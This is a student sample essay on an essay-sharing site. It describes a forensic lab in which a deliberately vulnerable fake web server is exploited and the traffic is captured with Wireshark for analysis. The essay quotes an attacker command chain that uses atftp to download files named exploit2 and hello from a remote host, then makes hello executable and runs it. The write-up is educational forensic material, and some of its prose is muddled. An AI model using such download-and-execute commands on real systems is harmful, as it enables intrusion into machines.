StudentShare
Contact Us
Sign In / Sign Up for FREE
Search
Go to advanced search...
Free

Post Mortem Forensic Analysis - Research Paper Example

Cite this document
Summary
The writer of the essay "Post Mortem Forensic Analysis" has demonstrated the importance of digital forensic investigations that may significantly impact financial institutions due to their nature of the business and paramount financial and information assets residing on the network…
Download full paper File format: .doc, available for editing
GRAB THE BEST PAPER97.3% of users find it useful
Post Mortem Forensic Analysis
Read Text Preview

Extract of sample "Post Mortem Forensic Analysis"

Post Mortem Forensic Analysis Introduction In the current advancements of the computing world, an attacker initiates prevalent attacks that are vivid and intense in order to compromise or destroying the target. Researchers have studied these attacks in order to provide a secure mechanism that may effectively detect and fight against these vivid attacks. These mechanisms known as IDS, antivirus, anti-spam, and anti-spywares do provide limited benefits to the end users. However, these secure mechanism frameworks do not support functionality of forensic investigations and post mortem analysis for any particular breach or incident within the network. In order to initialize a forensic analysis, the first step is to determine the point of the breach to the network. Likewise, after identifying the point of breach, a forensic examiner can evaluate its exploitation. Moreover, the examiners can also identity the source of the threat i.e. the Internet. As per the scenario, a large computer network is compromised by a threat that may have also exploited classified documents. The report will demonstrate the forensic analysis with the aid of FTK tools in order to identify the root cause of the threat. Overview If an organization is affected by a security breach, in some cases, it is complex to calculate risks related to information assets present on the network. Likewise, it depends on the severity of the threat that may have caused large disruptions in network-based services. This is the point where digital forensic expert are incorporated for identifying the threat, impact and network incidents caused by it. Organizations experience new techniques and methods from an ongoing investigation by a digital forensic expert. Likewise, the point of interception, methodology and protection etc. are considered to be critical. Moreover, financial institutions are keener to adopt forensic analysis, as this domain including business model and nature of the data, cannot compromise on security (Network postmortem: Forensic analysis after a compromise, n.d.). For instance, master card, visa, American express demonstrates a solid online security framework. In the current scenario, where a network is already breached by a threat, these forensic experts focus on three core factors i.e. (Network postmortem: Forensic analysis after a compromise, n.d.): A discovery process focused on understanding the application and network infrastructure, as well as the business information flow of the organization Interviews with key personnel to understand the facts of the case from the customer's perspective and identify suitable sources of forensics data Data collection to gather critical sources of evidence to support the investigation, followed by analysis Methodology Assuming that the threat has initially breached the application server that was serving as an intranet for the organization, forensic investigators construct a methodology that will monitor attacks from inbound and outbound networks. These three processes will be executed, in order to detect the cause and the source: pcap trace analysis that are initialized for server side attack pcap trace analysis that are initialized for client side attack netflow analysis initialized for network flow monitoring In order to capture attacks, forensic investigators implemented a vulnerable HTTP server. The server will acts as an original server and address every query related to HTTP. However, for processing a ‘POST’ request the server will initiate a separate thread that will encapsulate a shell incorporated by a port 12345. The replicated fake web server will process the shell code similarly to the original one. The tool that will be used for exploiting and capturing network traffic is ‘WireShark’(Cert Exercises Handbook – Scribd, n.d.). It is an open-source tool that is meant for capturing data packets and network traffic examination on wired and wireless networks (Wireshark Network Analysis n.d.). Similarly, this tool will capture and examine network traffic on the Ethernet interface connected to the fake web server. Apart from Wireshark, tftp server and tftp client will also be implemented. As the web server is equipped with Apache, one more tool named as exploit followed by the command (Cert Exercises Handbook – Scribd, n.d.): (/usr/share/exercises/07_NF/adds/exploit) Prior to start the replicated fake web server, there is a requirement for stopping Apache server services. The next step is to initialize the server type by executing the following command (Cert Exercises Handbook – Scribd, n.d.): (sudo /etc/init.d/http_server ) The next step is to initialized customized scripts named as interface_affected and interface_hacker. The pcap file will demonstrate the log files of the attacks that are initiated from an IP address that is dissimilar than the victim’s IP address. Executing Wire Shark Before executing the exploitation process, ‘Wireshark’ will be executed, in order to capture live traffic on the loop back interface. After executing the tool, local URL will be executed from the browser. In order to increase request from the same site, user will increase incoming request by navigating the local site. In this process, the activity will impose the copying of files related to malicious code or threats to the replicated fake web server. Likewise, attacker’s files will be copied to the root folder, as the server was logged in by the root credentials. Consequently, the files that are transmitted from the hacker’s computer to the fake replicated web server were captured by ‘Wireshark’ tool and therefore, the packets that resulted in exploiting the server were successfully possessed by ‘Wireshark’ that can now be investigated (Cert Exercises Handbook – Scribd, n.d.) As mentioned earlier, exploit operates on the port 12345, all the traffic that is redirected to this specific port can be analyzed. In order to analyze the port, filter is required that will separate the traffic transmitting from port 12345. Likewise, after initiating the TCP session, following commands will be executed (Cert Exercises Handbook – Scribd, n.d.): cd ~; atftp --get --remote-file exploit2 IP address; atftp --get --remote-file hello IP address; chmod +x hello; ./hello Conclusion In this small forensic post mortem report, we have demonstrated the importance of these digital forensic investigations that may significantly impact financial institutions due to their nature of business and paramount financial and information assets residing on the network. We have also demonstrated the methodology including several forensic investigation tools that may aid in extracting proofs and source of threats on the Internet. References Network postmortem: Forensic analysis after a compromise ... (n.d.). Retrieved from http://www.computerworld.com/s/article/87969/Network_postmortem_Forensic_analysis_after_a_compromise Cert Exercises Handbook - Scribd. (n.d.). Retrieved from http://www.scribd.com/doc/35011748/Cert-Exercises-Handbook Wireshark Network Analysis. (n.d.). Retrieved from http://wiresharkbook.com/articlewireshark101.html Read More
Tags
Cite this document
  • APA
  • MLA
  • CHICAGO
(“Post Mortem Forensic Analysis Research Paper Example | Topics and Well Written Essays - 1000 words”, n.d.)
Retrieved from https://studentshare.org/information-technology/1430891-post-mortem-forensic-analysis
(Post Mortem Forensic Analysis Research Paper Example | Topics and Well Written Essays - 1000 Words)
https://studentshare.org/information-technology/1430891-post-mortem-forensic-analysis.
“Post Mortem Forensic Analysis Research Paper Example | Topics and Well Written Essays - 1000 Words”, n.d. https://studentshare.org/information-technology/1430891-post-mortem-forensic-analysis.
  • Cited: 0 times

CHECK THESE SAMPLES OF Post Mortem Forensic Analysis

The century of a detective

This helps in skeletal reconstruction in post mortem examination.... This is due to the analysis that is done on the human body skeletal system.... The book contains well researched work that covers a lot on forensic science.... The book gives information regarding forensic science especially the history of it.... The book contains well researched work that covers a lot on forensic science.... The book gives important information regarding forensic science especially the history of it....
4 Pages (1000 words) Essay

Managing Digital Evidence

Your law enforcement team could undergo basic training on how to recognize, seize, transport and store original evidence in order to preserve it for forensic examination.... You have requested that my team participate with the information security group in the investigation of computer incidents that may involve company computers....
12 Pages (3000 words) Essay

Forensic Medicine Development

forensic science is also called forensic pathology, medical jurisprudence or legal medicine.... Medical confidentiality can raise conflicts between law and medicine (forensic-Medecine.... forensic medicine is an important area of forensic science and it involves the application of medical knowledge to civil and criminal law.... The areas of medicine that are used in forensic medicine are pathology, psychiatry, and anatomy....
5 Pages (1250 words) Essay

Forensic Chemical Pathology

Pharmacokinetics is a branch of pharmacology that scientifically studies the drug disposition in the body and the general changes that occurs in drug plasma concentration.... This show that plasma concentration changes with the following process involved in drug utilization in the… These processes involve administration, absorption, distribution, and elimination of drug from the blood. Drug administration is the process by which drug is introduced into the human body through various methods ....
5 Pages (1250 words) Essay

Forensic Entomology: The Use of Blowfly Species to Determine Post-Mortem Interval (PMI)

The rate of development of the blowfly is used extensively in forensic entomology to estimate the PMI since an analysis of the developmental stages of flies recovered from corpses can be used as a measuring tool to estimate the time elapsed since death.... This essay is a review of four research articles in the area of medic-legal forensic entomology.... Each of these research topics involves an assessment of the use of species of blowfly as a tool to estimate the time of death as it relates to postmortem interval (PMI)  … Each of these research studies draws attention to the importance of variations in environmental conditions that may affect the timing and duration of developmental stages of the blowfly in ways that have significant potential to introduce artifacts into the estimates of PMI that are based on these temporal measurements   There are several important branches of forensic entomology that include stored-product, medico-legal or criminal and urban forensics....
7 Pages (1750 words) Research Paper

Forensic Science - the Art of Blood Drop Reading

However, BPA analysis determined that the victim's hands were covered with blood but not the knife, which did not sustain Backhouse's claim that the victim attacked before he shot the victim.... The assignment "forensic Science - the Art of Blood Drop Reading" is dedicated to the science of interpreting crime details by passive bloodstains, phenotype characteristics, sex elimination on the basis of the DNA sample, The presence of petechial hemorrhage in the conjunctiva of the eye, etc....
6 Pages (1500 words) Assignment

Application in Forensic Odontology

Several procedures must be accomplished by a forensic odontologist to carry out a dental examination of the remains of an unknown person during post mortem examination.... Photography, radiography, jaw resection and dental impressions are necessary procedures that must be undertaken by a forensic odontologist to accurately present an objective dental post mortem examination report to investigators.... … Forensic Odontology AbstractForensic Odontology is widely used in criminal investigation particularly in identification of remains of unknown or deceased individuals as well as identifying assailants of victims of crimes through bite mark analysis....
12 Pages (3000 words) Essay

Understanding Forensic Science

It is largely used in physical, chemical, biological and ecological analysis.... DNA analysis includes the use of human fingerprints in the criminal investigation in order to adduce evidence that can be used in criminal proceedings.... The current methods of DNA analysis used include restriction fragment length polymorphism(RFLP), polymerase chain reaction (PCR), short tandem repeats (STR), and amplified fragment length polymorphism (AmpFLP) (Byrd & Castner, 2001)....
8 Pages (2000 words) Assignment
sponsored ads
We use cookies to create the best experience for you. Keep on browsing if you are OK with that, or find out how to manage cookies.
Contact Us